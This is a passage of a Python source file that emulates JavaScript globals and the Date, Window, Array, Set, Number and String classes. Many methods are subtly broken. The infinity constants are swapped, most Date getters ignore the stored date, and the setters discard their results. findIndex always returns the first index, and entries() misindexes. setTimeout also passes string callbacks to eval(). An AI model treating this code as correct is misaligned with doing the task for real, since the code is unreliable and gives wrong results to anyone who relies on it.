String(x): """ Converts an object's value to a string """ return str(x) def undefined(self): """ Indicates that a variable has not been assigned a value """ return None # @staticmethod # def unescape(): """ Deprecated in version 1.5. Use decodeURI() or decodeURIComponent() instead """ # pass @staticmethod def require(path: str): """ Loads a script from a file """ # '.'.join(path.split('/')) # module = __import__(path) # app.components.{component} # my_class = getattr(module, component.title()) # return my_class() raise NotImplementedError @staticmethod def setTimeout(callback, t, *args, **kwargs): """[sets a timer which executes a function or evaluates an expression after a specified delay] Args: callback (function): [method to be executed after the delay] t ([int]): [milliseconds] Returns: [str]: [an identifier for the timer] """ if isinstance(callback, str): callback = eval(callback) timer = threading.Timer(t / 1000, callback, args=args, kwargs=kwargs) timer_id = id(timer) Global.__timers[timer_id] = timer timer.start() return timer_id @staticmethod def clearTimeout(timeoutID): """ [cancels a timer set with setTimeout()] Args: timeoutID ([str]): [the identifier returned by setTimeout()] """ Global.__timers.pop(timeoutID).cancel() # NOTE - for globals use the class to make them but then register them here decodeURI = Global.decodeURI decodeURIComponent = Global.decodeURIComponent encodeURI = Global.encodeURI encodeURIComponent = Global.encodeURIComponent parseFloat = Global.parseFloat parseInt = Global.parseInt setTimeout = Global.setTimeout clearTimeout = Global.clearTimeout class Performance(): _start = time.time() def __init__(self): pass def now(self): end = time.time() return end - Performance._start # def reset(self): # Performance._start = time.time() performance = Performance() class Date(Object): """ javascript date """ def __init__(self, date=None, formatter='python'): self.formatter = formatter if isinstance(date, int): self.date = datetime.datetime.fromtimestamp(date) return # elif isinstance(date, str): # if formatter == 'python': # 
self.date = datetime.datetime.strptime(date, '%Y-%m-%d %H:%M:%S') # elif formatter == 'javascript': # self.date = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%fZ') # else: # raise ValueError('Invalid formatter') if date is None: self.date = datetime.datetime.now() else: self.date = self.parse_date(date) def __str__(self): return self.toString() def toString(self): """ Returns a string representation of the date """ if self.formatter == 'python': return self.date.strftime('%Y-%m-%d %H:%M:%S') else: return self.date.strftime('%Y-%m-%dT%H:%M:%S.%fZ') # js def parse_date(self, date_string): self.date = parse(date_string) return self.date def getDate(self): """ Returns the day of the month (from 1-31) """ return self.date.day # TODO - do for a date object passed in. this only does today def getDay(self): """ Returns the day of the week (from 0-6) """ day = self.date.isoweekday() return day if (day < 7) else 0 # TODO - do for a date object passed in. this only does today def getFullYear(self): """ Returns the year """ return self.date.now().year def getHours(self): """ Returns the hour (from 0-23) """ return self.date.now().hour def getMilliseconds(self): """ Returns the milliseconds (from 0-999) """ return round(self.date.now().microsecond / 1000) def getMinutes(self): """ Returns the minutes (from 0-59) """ return self.date.now().minute def getMonth(self): """ Returns the month (from 0-11) """ return self.date.now().month - 1 def getSeconds(self): """ Returns the seconds (from 0-59) """ return self.date.now().second def getTime(self): """ Returns the number of milliseconds since midnight Jan 1 1970, and a specified date """ return int(str(time.time()).split('.')[0]) # TODO - whats difference between this and 'now()' ? def getTimezoneOffset(self): """ Returns the time difference between UTC time and local time, in minutes """ return self.date.now().utcoffset().total_seconds() / 60 # TODO - TEST def getUTCDate(self): """ Returns the day of the month, according to universal time (from 1-31) """ return self.date.utcnow().month def getUTCDay(self): """ Returns the day of the week, according to universal time (from 0-6) """ return self.date.utcnow().day def getUTCFullYear(self): """ Returns the year, according to universal time """ return self.date.utcnow().year def getUTCHours(self): """ Returns the hour, according to universal time (from 0-23) """ return self.date.utcnow().hour def getUTCMilliseconds(self): """ Returns the milliseconds, according to universal time (from 0-999) """ return round(self.date.utcnow().microsecond / 1000) def getUTCMinutes(self): """ Returns the minutes, according to universal time (from 0-59) """ return self.date.utcnow().minute def getUTCMonth(self): """ Returns the month, according to universal time (from 0-11) """ return self.date.utcnow().month - 1 def getUTCSeconds(self): """ Returns the seconds, according to universal time (from 0-59) """ return self.date.utcnow().second def getYear(self): """ Deprecated. Use the getFullYear() method instead """ return self.date.now().year @staticmethod def now(): """ Returns the number of milliseconds since midnight Jan 1, 1970 """ return round(time.time() * 1000) # @staticmethod def parse(self, date_string): """ Parses a date string and returns the number of milliseconds since January 1, 1970 """ self.date = self.parse_date(str(date_string)) #  TODO - huh? 
# return self.date.getTime() def setDate(self, day): """ Sets the day of the month of a date object """ self.date.replace(day=int(day)) # return self.date.getTime() def setFullYear(self, year): """ Sets the year of a date object """ self.date.replace(year=int(year)) # return self.date.getTime() def setHours(self, hours): """ Sets the hour of a date object """ self.date.replace(hour=int(hours)) # return self.date.getTime() def setMilliseconds(self, milliseconds): """ Sets the milliseconds of a date object """ # self.date.replace(millisecond=int(milliseconds)) # return self.now() print('TODO: setMilliseconds') pass # TODO - , seconds = None, milliseconds = None): def setMinutes(self, minutes): """ Set the minutes of a date object """ self.date.replace(minute=int(minutes)) # return self.now() def setMonth(self, month): """ Sets the month of a date object """ self.date.replace(month=int(month)) # return self.now() def setSeconds(self, seconds): """ Sets the seconds of a date object """ self.date.replace(second=int(seconds)) # return self.now() # Sets a date to a specified number of milliseconds after/before January 1, 1970 def setTime(self, milliseconds=None): """ Sets the number of milliseconds since January 1, 1970 """ # test copilot # self.date.replace(millisecond=int(milliseconds)) # return self.now() # TODO - is this right? - is this same as now()? # print('TODO: setTime') # raise NotImplementedErro pass def setUTCDate(self, day): """ Sets the day of the month of a date object, according to universal time """ self.setDate(day) # return self.getTime() def setUTCFullYear(self, year): """ Sets the year of a date object, according to universal time """ self.setFullYear(year) # return self.getTime() def setUTCHours(self, hour): """ Sets the hour of a date object, according to universal time """ self.setHours(hour) # return self.getTime() def setUTCMilliseconds(self, milliseconds): """ Sets the milliseconds of a date object, according to universal time """ self.setMilliseconds(milliseconds) # return self.getTime() def setUTCMinutes(self, minutes): """ Set the minutes of a date object, according to universal time """ self.setMinutes(minutes) # return self.getTime() def setUTCMonth(self, month): """ Sets the month of a date object, according to universal time """ self.setMonth(month) # return self.getTime() def setUTCSeconds(self, seconds): """ Set the seconds of a date object, according to universal time """ self.setSeconds(seconds) # return self.getTime() def setYear(self, year): """ Deprecated. Use the setFullYear() method instead """ self.date.replace(year=int(year)) # return self.getTime() # TODO - there may not be a date object already? def toDateString(self): """ Converts the date portion of a Date object into a readable string """ return self.date.strftime('%Y-%m-%d') def toUTCString(self): """ Converts a Date object to a string, according to universal time """ return self.date.strftime('%Y-%m-%d %H:%M:%S') def toGMTString(self): """ Deprecated. 
Use the toUTCString() method instead """ return self.toUTCString() def toJSON(self): """ Returns the date as a string, formatted as a JSON date """ return json.dumps(self.date.strftime('%Y-%m-%d')) def toISOString(self): """ Returns the date as a string, using the ISO standard """ return self.date.strftime('%Y-%m-%d') def toLocaleDateString(self): """ Returns the date portion of a Date object as a string, using locale conventions """ return self.date.strftime('%x') def toLocaleString(self): """ Converts a Date object to a string, using locale conventions """ return self.date.strftime('%x') def toLocaleTimeString(self): """ Returns the time portion of a Date object as a string, using locale conventions """ return self.date.strftime('%X') def toTimeString(self): """ Converts the time portion of a Date object to a string """ return self.date.strftime('%X') def UTC(self): """ Returns the number of milliseconds in a date since midnight of January 1, 1970, according to UTC time """ return self.date.utcnow() class Screen: """ screen """ # wrap a lib? # https://github.com/rr-/screeninfo? def __init__(self): # from sys import platform # if platform == "linux" or platform == "linux2": # # linux # import subprocess # resuls = subprocess.Popen(['xrandr'],stdout=subprocess.PIPE).communicate()[0].split("current")[1].split(",")[0] # width = resuls.split("x")[0].strip() # heigth = resuls.split("x")[1].strip() # print width + "x" + heigth # elif platform == "darwin": # # OS X # results = str(subprocess.Popen(['system_profiler SPDisplaysDataType'],stdout=subprocess.PIPE, shell=True).communicate()[0]) # res = re.search('Resolution: \d* x \d*', results).group(0).split(' ') # width, height = res[1], res[3] # return width, height # elif platform == "win32": # from win32api import GetSystemMetrics # print("Width =", GetSystemMetrics(0)) # print("Height =", GetSystemMetrics(1)) pass def availHeight(self): ''' Returns the height of the screen (excluding the Windows Taskbar) ''' # return self.height raise NotImplementedError def availWidth(self): ''' Returns the width of the screen (excluding the Windows Taskbar) ''' raise NotImplementedError def colorDepth(self): ''' Returns the colorDepth ''' raise NotImplementedError def height(self): ''' Returns the total height of the screen ''' raise NotImplementedError def pixelDepth(self): ''' Returns the pixelDepth ''' raise NotImplementedError def width(self): ''' Returns the total width of the screen ''' raise NotImplementedError class ProgramKilled(Exception): pass class Job(threading.Thread): def __init__(self, interval, execute, *args, **kwargs): threading.Thread.__init__(self) self.daemon = False self.stopped = threading.Event() self.interval = interval self.execute = execute self.args = args self.kwargs = kwargs def stop(self): self.stopped.set() self.join() def run(self): while not self.stopped.wait(self.interval.total_seconds()): self.execute(*self.args, **self.kwargs) # def __str__(self): # return "Job every %s" % self.interval class SetInterval: def signal_handler(self, signum, frame): raise ProgramKilled def __init__(self, function, time, *args, **kwargs): signal.signal(signal.SIGTERM, self.signal_handler) signal.signal(signal.SIGINT, self.signal_handler) self.job = Job(datetime.timedelta(microseconds=time * 1000), function, *args, **kwargs) self.job.start() # def stop(self): # self.job.stop() class Promise: # undocumented - warning. 
use at own risk def __init__(self, func=None, *args, **kwargs): # print('init') self.data = None self.state = 'pending' # fullfilled, rejected if func is not None: func(self.resolve, self.reject) def then(self, func): if func is not None: # print('--->',self.data) self.data = func(self.data) # print('-->',self.data) return self def catch(self, error): # func(error) print(error) return self def resolve(self, data): # print( 'resolve called::', data ) self.data = data self.state = "fulfilled" return self def reject(self, data): self.data = data self.state = "rejected" return self # def __str__(self): # try: # return self.data.text # except Exception as e: # print(e) # return str(self) class FetchedSet: # not a promise def __init__(self, *args, **kwargs): self.results = [] def __getitem__(self, index): return self.results[index] def oncomplete(self, func): # runs once all results are back func(self.results) return # def __call__(self, func): # self.results.append(func) class Window: """ window """ localStorage = Storage() location = 'eventual.technology' def __init__(self, *args, **kwargs): # self.console = dom.console # self.document = Document # globals()? # dir()? # locals()? pass # TODO - tell users to use other window class if methods are called. @staticmethod def alert(msg): """ Displays an alert box with a message and an OK button """ print(msg) return @staticmethod def prompt(msg, default_text=""): """ Displays a dialog box that prompts the visitor for input """ print(msg) data = input() return data setTimeout = Global.setTimeout clearTimeout = Global.clearTimeout @staticmethod def clearInterval(job): job.stop() @staticmethod def setInterval(function, time, *args, **kwargs): interval_ID = SetInterval(function, time, *args, **kwargs) return interval_ID.job @staticmethod def _do_request(url, f=None, **kwargs): # private - don't use directly. use one of the fetch methods try: # r = requests.get(url, timeout=3) from requests import Request, Session method = "GET" if "method" in kwargs: method = kwargs["method"] if "callback_function" in kwargs: del kwargs["callback_function"] if "error_handler" in kwargs: del kwargs["error_handler"] s = Session() req = Request(method, url) prepped = s.prepare_request(req) r = s.send(prepped, **kwargs) # print(r.status_code) s.close() if f is not None and type(f) is FetchedSet: f.results.append(r) return r except Exception as e: print(f'Request Failed for URL: {url}', e) return None @staticmethod def fetch(url: str, **kwargs): # undocumented - warning. use at own risk # note - kinda pointless atm. just use requests directly and you wont have to muck about with a Promise if type(url) is not str: raise ValueError('fetch takes a single url string. use fetch_set, fetch_threaded or fetch_pooled') f = Promise() r = window._do_request(url, f, *kwargs) return f.resolve(r) @staticmethod def fetch_set(urls: list, callback_function=None, error_handler=None, **kwargs): # undocumented - warning. use at own risk # note - still blocks. just gets all before continuing # problems - all urls can only have 1 associated callback, error and set of kwargs if type(urls) is str: urls = [urls] # leniency f = FetchedSet() for url in urls: r = window.fetch(url, **kwargs).then(callback_function) f.results.append(r.data) return f @staticmethod def fetch_threaded(urls: list, callback_function=None, error_handler=None, **kwargs): # undocumented - warning. use at own risk # note - still blocks. 
just gets all before continuing using threads # problems - all urls can only have 1 associated callback, error and set of kwargs if type(urls) is str: urls = [urls] # leniency f = FetchedSet() jobs = [] for url in urls: thread = threading.Thread(target=window._do_request(url, f, **kwargs)) # thread.setDaemon(True) # deprecated thread.daemon = True jobs.append(thread) map(lambda j: j.start(), jobs) map(lambda j: j.join(), jobs) # f = FetchedSet() return f @staticmethod def fetch_pooled(urls: list, callback_function=None, error_handler=None, **kwargs): # undocumented - warning. use at own risk # note - still blocks. just gets all before continuing using a pool # problems - all urls can only have 1 associated callback, error and set of kwargs if type(urls) is str: urls = [urls] # leniency f = FetchedSet() def _do_request_wrapper(obj): url = obj['url'] f = obj['f'] kwargs = obj['k'] kwargs['callback_function'] = obj['c'] kwargs['error_handler'] = obj['e'] window._do_request(url, f, **kwargs) jobs = [] p = Pool() urls = [{'url': url, 'f': f, 'c': callback_function, 'e': error_handler, 'k': kwargs} for url in urls] results = p.map(_do_request_wrapper, urls) p.close() p.join() return f # def fetch_aysnc( urls: list, options={}, type="async" ): # TODO - a version using async/await @staticmethod def btoa(dataString): """ Encodes a string in base-64 """ import base64 dataBytes = dataString.encode("utf-8") encoded = base64.b64encode(dataBytes) return encoded @staticmethod def atob(dataString): """ Decodes a base-64 encoded string """ import base64 return base64.b64decode(dataString).decode() @staticmethod def requestAnimationFrame(callback): """[requests a frame of an animation] Args: callback (callable): [the callback function] Returns: [type]: [description] """ perf = Global.performance.now() return callback(perf) # these probably should have been on global. will see about moving them later setInterval = Window.setInterval clearInterval = Window.clearInterval Global.setInterval = Window.setInterval Global.clearInterval = Window.clearInterval window = Window class Array: """ javascript array """ @staticmethod def from_(obj): # TODO - test """ Creates a new Array instance from an array-like or iterable object. """ # return Array(object) if isinstance(obj, Array): return obj elif isinstance(obj, list): return Array(*obj) elif isinstance(obj, tuple): items = list(obj) return Array(*items) elif isinstance(obj, dict): items = list(obj.items()) return Array(*items) # if it is iterable unpack it elif hasattr(obj, '__iter__'): items = list(obj) return Array(*items) else: return Array([obj]) @staticmethod def of(*args): # TODO - test """ Creates a new Array instance with a variable number of arguments, regardless of number or type of the arguments. 
""" return Array(args) def __init__(self, *args): """[An Array that behaves like a js array] """ # casting if len(args) == 1: if isinstance(args[0], list): self.args = args[0] return elif isinstance(args[0], int): # self.args = [None] * args[0] # self.args = [null()] * args[0] self.args = [""] * args[0] return self.args = list(args) self.prototype = self def __getitem__(self, index): return self.args[index] def __getattribute__(self, name): try: return super().__getattribute__(name) except AttributeError: # if its a list method get it from args if name in dir(list): return getattr(self.args, name) def __setitem__(self, index, value): self.args[index] = value def __add__(self, value): if isinstance(value, int): raise ValueError('int not supported') if isinstance(value, Array): self.args = self.args + value.args if isinstance(value, list): self.args = self.args + value return self.args def __len__(self): return len(self.args) def __eq__(self, other): if isinstance(other, Array): return self.args == other.args if isinstance(other, list): return self.args == other return False def __ne__(self, other): return not self.__eq__(other) def __repr__(self): return str(self.args) def __iter__(self): for i in self.args: yield i # self.args.__iter__() def __sub__(self, value): if isinstance(value, int): raise ValueError('int not supported') if isinstance(value, Array): self.args = self.args - value.args if isinstance(value, list): self.args = self.args - value return self.args def toString(self): ''' Converts an array to a string, and returns the result ''' return str(self.args) # TODO - check what js does def toSource(self): """ Returns the source array. """ return list(self.args) @property def length(self): """ Sets or returns the number of elements in an array """ return len(self.args) def concat(self, *args): """[Joins two or more arrays, and returns a copy of the joined arrays] Returns: [list]: [returns a copy of the joined arrays] """ for a in args: self.args += a return self.args def flat(self, depth=1): # TODO - test """[Flattens an array into a single-dimensional array or a depth of arrays] """ if depth < 1: raise ValueError('depth must be greater than 0') if depth == 1: return self.args flat = [] for i in self.args: flat += i.flat(depth - 1) return flat def flatMap(self, fn): # TODO - test """[Maps a function over an array and flattens the result] """ return Array(fn(i) for i in self.args) def fill(self, value=None, start=None, end=None): """[Fills elements of an array from a start index to an end index with a static value] """ if start is None: start = 0 if end is None: end = len(self.args) for i in range(start, end): self.args[i] = value return self.args def groupBy(self, callback) -> dict: # TODO - test """[Groups the elements of an array according to the result of calling a callback function on each element] Args: callback (callable): [the callback recieves the following paramters(value, index, target)] Returns: [dict]: [a dictionary of arrays] """ groups = {} for i in range(len(self.args)): key = callback(self.args[i], i, self.args) if key in groups: groups[key].append(self.args[i]) else: groups[key] = [self.args[i]] return groups # def groupByToMap(self, callback): # """[returns a Map object] # """ # groups = {} # for i in range(len(self.args)): # key = callback(self.args[i], i, self.args) # if key in groups: # groups[key].append(self.args[i]) # else: # groups[key] = [self.args[i]] # return Map(groups) def findLast(self, callback): """[Returns the last element in an array that passes a 
test] """ for i in range(len(self.args) - 1, -1, -1): if callback(self.args[i], i, self.args): return self.args[i] return None def findLastIndex(self, callback): """[Returns the last index of an element in an array that passes a test] """ for i in range(len(self.args) - 1, -1, -1): if callback(self.args[i], i, self.args): return i return -1 def includes(self, value): # -> bool: """[Check if an array contains the specified item Args: value ([any]): [any value] Returns: [bool]: [a boolean] """ if value in self.args: return True else: return False def indexOf(self, value): """ Search the array for an element and returns its position """ # for count, each in enumerate(self.args): # if each == value: # return count try: return self.args.index(value) except ValueError: return -1 except Exception as e: # print(e) return -1 @staticmethod def isArray(thing): """[Checks whether an object is an array] Args: thing ([type]): [thing to check] Returns: [bool]: [True if the object is list, tuple or Array] """ if isinstance(thing, (list, tuple, Array)): return True else: return False def join(self, value): """ Joins all elements of an array into a string """ # TODO - get passed param names return value.join([str(x) for x in self.args]) def lastIndexOf(self, value): """ Search the array for an element, starting at the end, and returns its position """ try: return len(self.args) - self.args[::-1].index(value) - 1 except Exception as e: # print(e) return None def pop(self): """ Removes the last element of an array, and returns that element """ # item = self.args[len(self.args)-1] # del self.args[len(self.args)-1] return self.args.pop() def push(self, value): """ Adds new elements to the end of an array, and returns the new length """ self.args.append(value) return len(self.args) def reverse(self): """ Reverses the order of the elements in an array """ self.args = self.args[::-1] return self.args def slice(self, start=0, stop=None, step=1): """[Selects a part of an array, and returns the new array] Args: start ([int]): [index to slice from] stop ([int], optional): [index to slice to]. Defaults to end of the array. step (int, optional): [description]. Defaults to 1. 
Returns: [type]: [new array] """ if stop is None: stop = len(self.args) return self.args[slice(start, stop, step)] def splice(self, start, delete_count=None, *items): """ Selects a part of an array, and returns the new array """ if delete_count is None: delete_count = len(self.args) - start total = start + delete_count removed = self.args[start:total] self.args[start:total] = items return removed # return self.args def unshift(self, *args): """[Adds new elements to the beginning of an array, and returns the new length] Returns: [int]: [the length of the array] """ for i in reversed(args): self.args.insert(0, i) return len(self.args) def shift(self): """[removes the first element from an array and returns that removed element] Returns: [type]: [the removed array element] """ item = self.args[0] del self.args[0] return item def map(self, func): """[Creates a new array with the result of calling a function for each array element] Args: func ([type]): [a function to call on each array element] Returns: [list]: [a new array] """ # print(func) return [func(value) for value in self.args] # return map(self.args, func) def some(self, func): """ Checks if any of the elements in an array pass a test """ return any(func(value) for value in self.args) def sort(self, func=None): # , *args, **kwargs): """ Sorts the elements of an array """ if func is not None: return self.args.sort(key=func(*self.args)) def comp(o): return str(o) # manually sort lexicographically for i in range(len(self.args)): for j in range(i + 1, len(self.args)): if comp(self.args[i]) > comp(self.args[j]): self.args[i], self.args[j] = self.args[j], self.args[i] return self.args def reduce(self, callback, initialValue=None): """ Reduces the array to a single value (going left-to-right) callback recieve theses parameters: previousValue, currentValue, currentIndex, array """ arguments = self.args if initialValue is None: initialValue = arguments[0] arguments = arguments[1:] for i, value in enumerate(arguments): import inspect if len(inspect.signature(callback).parameters) == 4: initialValue = callback(initialValue, value, i, arguments) elif len(inspect.signature(callback).parameters) == 3: initialValue = callback(initialValue, value, i) elif len(inspect.signature(callback).parameters) == 2: initialValue = callback(initialValue, value) elif len(inspect.signature(callback).parameters) == 1: initialValue = callback(initialValue) else: raise Exception("Callback does not have the correct number of parameters") return initialValue def reduceRight(self, callback, initialValue=None): """ Reduces the array to a single value (going right-to-left) callback recieve theses parameters: previousValue, currentValue, currentIndex, array """ arguments = self.args if initialValue is None: initialValue = arguments[-1] arguments = arguments[:-1] for i, value in enumerate(reversed(arguments)): import inspect if len(inspect.signature(callback).parameters) == 4: initialValue = callback(initialValue, value, i, arguments) elif len(inspect.signature(callback).parameters) == 3: initialValue = callback(initialValue, value, i) elif len(inspect.signature(callback).parameters) == 2: initialValue = callback(initialValue, value) elif len(inspect.signature(callback).parameters) == 1: initialValue = callback(initialValue) else: raise Exception("Callback does not have the correct number of parameters") return initialValue def filter(self, func): """ Creates a new array with every element in an array that pass a test i.e. 
even_numbers = someArr.filter( lambda x: x % 2 == 0 ) """ # written by .ai (https://6b.eleuther.ai/) # filtered = [] # for value in self.args: # if func(value): # filtered.append(value) # return filtered return list(filter(func, self.args)) def find(self, func): """ Returns the value of the first element in an array that pass a test """ for each in self.args: if func(each): return each def findIndex(self, value): """ Returns the index of the first element in an array that pass a test """ # written by .ai (https://6b.eleuther.ai/) for i, value in enumerate(self.args): if value == value: return i return -1 def forEach(self, func): """ Calls a function for each array element """ # written by .ai (https://6b.eleuther.ai/) for value in self.args: func(value) # TODO - is this supposed to pass count like Node list? i.e. # for i in range(len(self.args)): # func(self.args[i], i, self.args) def keys(self): """ Returns a Array Iteration Object, containing the keys of the original array """ for i in self.args: yield i def copyWithin(self, target, start=0, end=None): """ Copies array elements within the array, from start to end """ if end is None: end = len(target) for i in range(start, end): self.args[i] = target[i] def entries(self): """[Returns a key/value pair Array Iteration Object] Yields: [type]: [key/value pair] """ for i in self.args: yield [i, self.args[i]] def every(self, func): """[Checks if every element in an array pass a test] Args: func ([type]): [test function] Returns: [bool]: [if every array elemnt passed the test] """ return all(func(value) for value in self.args) def at(self, index: int): """[takes an integer value and returns the item at that index, allowing for positive and negative integers. Negative integers count back from the last item in the array.] Args: index ([type]): [position of item] Returns: [type]: [item at the given position] """ return self.args[index] Array.prototype = Array class Set(): def __init__(self, *args): """[The Set object lets you store unique values of any type, whether primitive values or object references. TODO - will need to store dictionaries unlike a python set https://stackoverflow.com/questions/34097959/add-a-dictionary-to-a-set-with-union ] """ self.args = set(args) def __iter__(self): return iter(self.args) def __len__(self): return len(self.args) def __contains__(self, item): return item in self.args def __repr__(self): return repr(self.args) def __str__(self): return str(self.args) @property def species(self): """ The constructor function that is used to create derived objects. """ # return self.args raise NotImplementedError @property def size(self): """ Returns the number of values in the Set object. """ return len(self.args) def add(self, value): """ Appends value to the Set object. Returns the Set object with added value. """ # print(type(self.args), value) self.args.add(value) return self.args def clear(self): """ Removes all elements from the Set object. """ self.args.clear() def delete(self, value): """ Removes the element associated to the value returns a boolean asserting whether an element was successfully removed or not. """ return self.args.remove(value) def has(self, value): """ Returns a boolean asserting whether an element is present with the given value in the Set object or not. """ return value in self.args def contains(self, value): """ Returns a boolean asserting whether an element is present with the given value in the Set object or not. 
""" return value in self.args # Set.prototype[@@iterator]() # Returns a new iterator object that yields the values for each element in the Set object in insertion order. def values(self): """ Returns a new iterator object that yields the values for each element in the Set object in insertion order. """ return iter(self.args) # def keys(self): # """ An alias for values """ #? # return self.values() def entries(self): """ Returns a new iterator object that contains an array of [value, value] for each element in the Set object, in insertion order. """ return iter([[i, self.args[i]] for i in self.args]) # This is similar to the Map object, so that each entry's key is the same as its value for a Set. def forEach(self, callbackFn, thisArg=None): """ Calls callbackFn once for each value present in the Set object, in insertion order. If a thisArg parameter is provided, it will be used as the this value for each invocation of callbackFn. """ for i in self.args: callbackFn(i, thisArg) class Number(float): """ javascript Number methods """ # print(sys.float_info) MAX_VALUE = list(sys.float_info)[0] MIN_VALUE = 5E-324 # CHANGE no longer > list(sys.float_info)[3] NEGATIVE_INFINITY = float("inf") #: Represents negative infinity (returned on overflow) Number POSITIVE_INFINITY = float("-inf") #: Represents infinity (returned on overflow) Number # prototype Allows you to add properties and methods to an object Number def __init__(self, x="", *args, **kwargs): self.x = Global.Number(x) def __add__(self, other): return self.x + other def __sub__(self, other): return self.x - other def __mul__(self, other): return self.x * other def __div__(self, other): return self.x / other def __mod__(self, other): return self.x % other def __pow__(self, other): return self.x ** other def __neg__(self): return -self.x def __pos__(self): return +self.x def __abs__(self): return abs(self.x) def __invert__(self): return ~self.x def __lt__(self, other): return self.x < other def __le__(self, other): return self.x <= other def __eq__(self, other): return self.x == other def __ne__(self, other): return self.x != other def __gt__(self, other): return self.x > other def __ge__(self, other): return self.x >= other def __and__(self, other): return self.x & other def __or__(self, other): return self.x | other def __xor__(self, other): return self.x ^ other def __lshift__(self, other): return self.x << other def __rshift__(self, other): return self.x >> other def __iadd__(self, other): return self.x + other def __isub__(self, other): return self.x - other def __imul__(self, other): return self.x * other def __idiv__(self, other): return self.x / other def __imod__(self, other): return self.x % other def __ipow__(self, other): return self.x ** other def __ilshift__(self, other): return self.x << other def __irshift__(self, other): return self.x >> other def __iand__(self, other): return self.x & other def __ior__(self, other): return self.x | other def __ixor__(self, other): return self.x ^ other def __floordiv__(self, other): return self.x // other def __rfloordiv__(self, other): return other // self.x def __ifloordiv__(self, other): return other // self.x def __truediv__(self, other): return self.x / other def __rtruediv__(self, other): return other / self.x def __itruediv__(self, other): return other / self.x def __rmod__(self, other): return other % self.x def isInteger(self): """ Checks whether a value is an integer """ return (type(self.x) == int) def isSafeInteger(self): """ Checks whether a value is a safe integer """ raise 
NotImplementedError def toExponential(self, num=None): """ Converts a number into an exponential notation """ if num is not None: exp = '{:e}'.format(Number(Number(self.x).toFixed(num))) else: exp = '{:e}'.format(self.x) if 'e' in str(self.x): exp = str(self.x) # python already converts. n = exp.split('e')[0].rstrip("0") e = exp.split('e')[1].replace('00', '0') if n == "0.": n = "0" if int(e) != 0: if int(e) < 10 and int(e) > -10: # TODO - not correct. lazy way to strip left 0s only e = e.replace('0', '') # print( "AND:", n, "e" , e ) if n.endswith('.'): n = n.strip('.') return n + "e" + e def toFixed(self, digits: int): """[formats a number using fixed-point notation.] Args: digits ([int]): [The number of digits to appear after the decimal point Returns: [str]: [A string representing the given number using fixed-point notation.] """ # print("DIGIT!", digits) if digits < 0: digits = 0 fstring = "{:." + str(digits) + "f}" return fstring.format(round(self.x, digits)) def toPrecision(self, precision): """[returns a string representing the Number object to the specified precision.] Args: precision ([int]): [An integer specifying the number of significant digits.] Returns: [str]: [A string representing a Number object in fixed-point or exponential notation rounded to precision significant digits] """ precision = int(precision) # return str(math.pow(self.x, precision)) # raise NotImplementedError return str(round(self.x, precision)) def toString(self, base: int): """[returns a string representing the specified Number object.] Args: base (int): [An integer in the range 2 through 36 specifying the base to use for representing numeric values.] Returns: [str]: [a string representing the specified Number object] """ if base is None: return str(self.x) import string digs = string.digits + string.ascii_letters if self.x < 0: sign = -1 elif self.x == 0: return digs[0] else: sign = 1 self.x *= sign digits = [] while self.x: digits.append(digs[int(self.x % base)]) self.x = int(self.x / base) if sign < 0: digits.append('-') digits.reverse() return ''.join(digits) class String: """ javascript String methods """ @staticmethod def fromCodePoint(codePoint: int): """ Converts a Unicode code point into a string """ return chr(codePoint) @staticmethod def toCodePoint(char: str): """ Converts a Unicode string into a code point """ return ord(char) @staticmethod def raw(string): """ Returns the string as-is """ import re return re.escape(string) # @staticmethod # def fromCharCode(code: int): # """ Converts a Unicode code point into a string """ # return chr(code) @staticmethod def toCharCode(char: str): """ Converts a Unicode string into a code point """ return ord(char) def __init__(self, x="", *args, **kwargs): # self.args = args # self.kwargs = kwargs self.x = str(x) def __str__(self): return self.x def __eq__(self, other): if isinstance(other, str): return self.x == other if isinstance(other, String): return self.x == other.x return False # def __repr__(self): # return self.x def __getitem__(self, item): # print(item) return self.x[item] def __add__(self, other): return self.x + other def __radd__(self, other): return self.x + other def __iadd__(self, other): return self.x + other def __sub__(self, other): return self.x - other def __rsub__(self, other): return other - self.x def __isub__(self, other): return self.x - other def __mul__(self, other): return self.x * int(other) def __rmul__(self, other): return self.x * int(other) def __imul__(self, other): return self.x * int(other) def split(self, expr) -> 
list: """[can split a string based on a regex] Args: expr ([str]): [valid regex or string to split on] Returns: [list]: [list of str] """ # if isinstance( expr, RegExp) import re # print( '>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.', type(expr) ) is_regex = False try: re.compile(expr) is_regex = True except re.error: is_regex = False if is_regex: return re.split(expr, self.x) else: return self.x.split(expr) def concat(self, *args, seperator: str = "") -> str: """[concatenates the string arguments to the calling string and returns a new string.] Args: seperator (str, optional): []. Defaults to "". Returns: [type]: [A new string containing the combined text of the strings provided.] """ args = list(args) args.insert(0, self.x) return seperator.join(args) # @staticmethod def charCodeAt(self, index: int) -> int: """ Returns the Unicode of the character at the specified index """ return ord(self.x[index]) # @staticmethod def fromCharCode(self, *codes) -> str: """ returns a string created from the specified sequence of UTF-16 code units """ return "".join([str(chr(x)) for x in codes]) @property def length(self) -> int: return len(self.x) def repeat(self, count: int) -> str: """ Returns a new string with a specified number of copies of an existing string """ return self.x * count def startsWith(self, x: str, start: int = None, end: int = None) -> bool: """ Checks whether a string begins with specified characters """ if start is None: start = 0 if end is None: end = len(x) # print(self.x.startswith(x, start, end)) return self.x.startswith(x, start, end) def substring(self, start: int, end: int = None) -> str: """ Extracts the characters from a string, between two specified indices """ if start < 0: start = 0 if end is None: end = len(self.x) return self.x[start:end] def endsWith(self, x: str, start: int = None, end: int = None) -> bool: """ Checks whether a string ends with specified string/characters """ if start is None: start = 0 if end is None: end = len(x) return self.x.endswith(x, start, end) def toLowerCase(self) -> str: """ Converts a string to lowercase letters """ return self.x.lower() def toUpperCase(self) -> str: """ Converts a string to uppercase letters """ return self.x.upper() def slice(self, start: int = 0, end: int = None) -> str: """ Selects a part of an string, and returns the new string """ if end is None: end = len(self.x) return self.x[start:end] def trim(self): """ Removes whitespace from both ends of a string """ return self.x.strip() def charAt(self, index: int) -> str: """[Returns the character at the specified index (position)] Args: index (int): [index position] Returns: [str]: [the character at the specified index. if the index is out of range, an empty string is returned.] """ try: return self.x[index] except IndexError: return "" def replace(self, old: str, new) -> str: """ Searches a string for a specified value, or a regular expression, and returns a new string where the specified values are replaced. only replaces first one. """ if callable(new): # return new(self.x, old) return re.sub(old, new, self.x) else: return self.x.replace(old, new, 1) # re.sub(r"regepx", "old", "new") # TODO - js one also takes a regex def replaceAll(self, old: str, new: str): """[returns a new string where the specified values are replaced. 
